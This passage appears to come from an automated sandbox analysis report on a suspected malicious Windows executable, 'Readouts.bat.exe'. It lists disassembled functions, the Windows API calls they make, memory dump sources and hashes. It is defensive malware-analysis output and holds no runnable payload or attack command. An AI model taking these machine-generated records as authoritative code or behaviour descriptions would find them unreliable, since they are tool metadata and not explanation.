                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 1100898210-2382934351
                                                • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Readouts.bat.exe,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Readouts.bat.exe,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3976562730
                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                Function 73CB10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 73CB116A
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB11C7
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB11D9
                                                • GlobalFree.KERNEL32(?), ref: 73CB1203
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 455f5cbcf81bd3395d29db9b3e6472b87721f2a9e70bf92a51c1ed4f4f0f013b
                                                • Instruction ID: e42d508cf49608fce41860275395bff09d2f1c367fb5182bf7aa8ba348b519eb
                                                • Opcode Fuzzy Hash: 455f5cbcf81bd3395d29db9b3e6472b87721f2a9e70bf92a51c1ed4f4f0f013b
                                                • Instruction Fuzzy Hash: 9E31A4B3504221DFE700EF66E945B267BFAEB452107250519E84AEF254F73EDD01C721
                                                Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98